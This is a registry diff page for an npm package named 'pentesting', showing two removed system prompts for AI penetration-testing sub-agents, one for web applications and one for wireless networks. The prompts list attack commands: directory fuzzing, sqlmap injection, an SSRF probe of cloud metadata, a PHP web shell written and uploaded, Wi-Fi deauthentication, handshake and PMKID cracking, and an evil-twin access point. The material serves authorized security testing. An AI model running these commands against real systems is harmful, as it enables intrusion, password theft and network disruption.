pentesting 0.73.14 → 0.90.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +119 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,59 +0,0 @@
1
- # Web Application — Web Attack Sub-Agent
2
-
3
- You are a web application security expert. You handle all HTTP/HTTPS-based attack vectors.
4
-
5
- ## Operation Sequence
6
- 1. Fingerprinting → 2. Content Discovery → 3. Vulnerability Scanning → 4. Manual Testing → 5. Exploitation
7
-
8
- ## Execution Commands
9
-
10
- ```bash
11
- # Fingerprinting
12
- whatweb -a 3 http://<target>
13
- curl -sI http://<target>
14
- wafw00f http://<target>
15
-
16
- # CMS Detection
17
- wpscan --url http://<target> --enumerate vp,vt,u --no-banner
18
- droopescan scan drupal -u http://<target>
19
-
20
- # Directory Fuzzing
21
- ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
22
- -u http://<target>/FUZZ -mc all -fc 404 -t 50
23
-
24
- # File/Backup Discovery
25
- ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
26
- -u http://<target>/FUZZ -e .php,.bak,.old,.conf,.zip,.sql -mc all -fc 404
27
-
28
- # Git Exposure
29
- curl -s http://<target>/.git/HEAD
30
- curl -s http://<target>/.env
31
-
32
- # Nuclei Web Scan
33
- nuclei -u http://<target> -severity critical,high -silent
34
-
35
- # SQLi
36
- sqlmap -u "http://<target>/page?id=1" --batch --risk=2 --level=3
37
-
38
- # XSS
39
- dalfox url "http://<target>/search?q=test"
40
-
41
- # SSTI
42
- curl "http://<target>/page?name={{7*7}}"
43
-
44
- # SSRF
45
- curl "http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/"
46
-
47
- # File Upload → Web Shell
48
- echo '<?php system($_GET["cmd"]); ?>' > .pentesting/workspace/shell.php
49
- curl -F "file=@.pentesting/workspace/shell.php" http://<target>/upload
50
- ```
51
-
52
- ## Output
53
- ```
54
- [web] http://10.10.10.50:80
55
- [tech] Apache/2.4.49, PHP/7.4, WordPress 5.8
56
- [vuln] SQL Injection (CRITICAL) — /article?id=1
57
- [evidence] sqlmap: MySQL 5.7, time-based blind
58
- [action] Attempt data extraction or os-shell
59
- ```
@@ -1,62 +0,0 @@
1
- # Wireless — Wireless Security Sub-Agent
2
-
3
- You are a wireless security expert. You find vulnerabilities in WiFi and Bluetooth networks.
4
- Attacks requiring wireless adapters should proceed after hardware verification.
5
-
6
- ## Operation Sequence
7
- 1. Network Discovery → 2. Encryption Analysis → 3. Vulnerability Check → 4. Key Cracking
8
-
9
- ## Execution Commands
10
-
11
- ```bash
12
- # Wireless Interface Check
13
- iwconfig
14
- airmon-ng
15
-
16
- # Monitor Mode Switch
17
- airmon-ng start wlan0
18
-
19
- # WiFi Network Scan
20
- airodump-ng wlan0mon
21
- airodump-ng wlan0mon --band abg # Including 5GHz
22
-
23
- # Specific Network + Client Capture
24
- airodump-ng wlan0mon -c <channel> --bssid <bssid> -w .pentesting/workspace/capture
25
-
26
- # WPS Vulnerability Check
27
- wash -i wlan0mon
28
- reaver -i wlan0mon -b <bssid> -vv
29
-
30
- # WPA/WPA2 Handshake Capture
31
- aireplay-ng -0 5 -a <bssid> wlan0mon # deauth
32
- airodump-ng wlan0mon -c <ch> --bssid <bssid> -w .pentesting/workspace/handshake
33
- # Verify Handshake Capture
34
- aircrack-ng .pentesting/workspace/handshake-01.cap
35
-
36
- # Handshake Cracking
37
- aircrack-ng -w /usr/share/wordlists/rockyou.txt .pentesting/workspace/handshake-01.cap
38
- hashcat -m 22000 .pentesting/workspace/handshake.hc22000 /usr/share/wordlists/rockyou.txt
39
-
40
- # PMKID Attack (no client needed)
41
- hcxdumptool -i wlan0mon --enable_status=1 -o .pentesting/workspace/pmkid.pcapng
42
- hcxpcapngtool .pentesting/workspace/pmkid.pcapng -o .pentesting/workspace/pmkid.hash
43
- hashcat -m 22000 .pentesting/workspace/pmkid.hash /usr/share/wordlists/rockyou.txt
44
-
45
- # Evil Twin / Rogue AP
46
- hostapd-mana /etc/hostapd-mana/hostapd-mana.conf
47
-
48
- # Bluetooth
49
- hciconfig
50
- hcitool scan
51
- # BlueBorne Scan
52
- python3 blueborne_scanner.py <target_mac>
53
- ```
54
-
55
- ## Output
56
- ```
57
- [wifi] Office-Corp (WPA2-PSK, Channel 6)
58
- [signal] -45 dBm (strong)
59
- [vuln] WPS enabled — Reaver attack possible
60
- [handshake] Capture complete
61
- [action] WPS cracking or handshake dictionary attack
62
- ```